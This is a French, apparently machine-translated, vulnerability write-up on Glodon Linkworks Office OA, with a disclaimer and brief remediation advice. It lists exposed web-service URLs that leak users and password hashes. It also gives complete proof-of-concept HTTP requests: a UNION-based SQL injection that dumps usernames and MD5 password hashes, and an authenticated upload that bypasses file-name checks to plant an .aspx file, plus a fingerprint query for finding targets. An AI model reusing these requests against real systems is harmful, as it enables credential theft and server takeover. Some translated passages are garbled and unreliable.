Annuaire d'articles
- déclaration
- Il y a une fuite d’informations dans Glodon OA
- 1. Aperçu de la vulnérabilité
- 2. Récurrence des vulnérabilités
- 3. Suggestions de réparation
- Vulnérabilité d'injection SQL Glodon Linkworks Office OA + vulnérabilité de téléchargement de fichiers en arrière-plan
- 1. Présentation du produit
- 2. Aperçu de la vulnérabilité
- 3. Environnement de récurrence
- 4. Suggestions de réparation
déclaration
Veuillez ne pas utiliser les technologies pertinentes dans cet article pour vous livrer à des tests illégaux. Toutes les conséquences et pertes directes ou indirectes causées par la diffusion et l'utilisation des informations ou des outils fournis dans cet article sont de la responsabilité de l'utilisateur lui-même. Toutes les conséquences néfastes et L'auteur de l'article n'a aucune importance. Cet article est uniquement à des fins éducatives.
Il y a une fuite d’informations dans Glodon OA
1. Aperçu de la vulnérabilité
Il y a une fuite d'informations dans Glodon Linkworks Office OA. Un attaquant peut utiliser cette vulnérabilité pour obtenir le mot de passe du compte pour se connecter au backend, provoquant d'autres impacts.
2. Récurrence des vulnérabilités
L'interface du système est la suivante. Afficher tous les utilisateurs
avec des URL potentiellement dangereuses. Afficher tous les projets. Afficher le mot de passe du compte. Après le décryptage, connectez-vous au système backend comme suit.http://url/Org/service/Service.asmx
http://url/Org/service/Service.asmx/GetAllUsersXml
http://url/Org/service/Service.asmx/GetDeptXml4GEPS
http://url/Org/service/Service.asmx/GetUserXml4GEPS
3. Suggestions de réparation
1. Désactivez les pages ou les applications qui divulguent des informations sensibles.
2. Passez à une version sécurisée
Vulnérabilité d'injection SQL Glodon Linkworks Office OA + vulnérabilité de téléchargement de fichiers en arrière-plan
1. Présentation du produit
Glodon Linkworks Office OA (Office Automation) est une solution bureautique complète conçue pour améliorer l'efficacité du travail et les capacités de collaboration au sein d'une organisation. Il fournit une série de fonctions et d'outils pour aider les entreprises à gérer et à traiter les tâches de bureau, les processus et les documents quotidiens.
2. Aperçu de la vulnérabilité
Étant donné que l' GetIMDictionary
interface OA du bureau Glodon Linkworks ne filtrait pas efficacement les entrées de l'utilisateur, elle a été intégrée à l'instruction de requête SQL, ce qui a entraîné une vulnérabilité d'injection SQL dans le système. Il msgbroadcastuploadfile.aspx
existe une vulnérabilité de téléchargement de fichiers en arrière-plan dans l'interface. Une fois que l'attaquant a obtenu les informations d'administrateur via l'injection SQL, il peut se connecter et envoyer un package de requête pour obtenir les autorisations du serveur.
3. Environnement de récurrence
- Empreinte digitale Intergraph :
web.body="/Services/Identification/Server/"
visitez l'URL suivante pour vérifier si la vulnérabilité existe.
http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
Si la situation ci-dessus prouve que la vulnérabilité existe.
POC d'injection SQL
:
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: XX.XX.XX.XX:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ASP.NET_SessionId=zldmbkj4ufv4xjlkzvudfs31; GTP_IdServer_LangID=2052; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER –
Utilisez le décryptage MD5 et essayez de vous connecter au backend.
POC de téléchargement de fichier en arrière-plan
:
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: XX.XX.XX.XX:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: 登录后的cookie
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Length: 195
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
Content-Type: application/text
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj—
4. Suggestions de réparation
1. Restreindre l'accès aux adresses sources. N'ouvrez pas le système à Internet sauf si nécessaire.
2. Mettre à jour vers la dernière version